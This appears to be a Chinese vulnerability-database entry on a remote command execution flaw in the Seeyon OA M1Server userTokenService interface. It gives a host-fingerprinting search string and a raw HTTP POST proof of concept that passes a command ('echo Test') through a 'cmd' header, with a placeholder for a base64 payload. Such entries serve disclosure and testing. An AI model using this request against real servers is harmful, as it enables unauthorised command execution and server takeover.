跳到主要内容

致远OA M1Server userTokenService 远程命令执行漏洞

漏洞描述

致远OA M1Server userTokenService 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限

漏洞影响

致远OA M1Server

网络测绘

"M1-Server 已启动"

漏洞复现

主页面

image-20231213111423786

验证POC

POST /esn_mobile_pns/service/userTokenService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
cmd: @@@@@echo Test

{{base64dec()}}

image-20231213111409774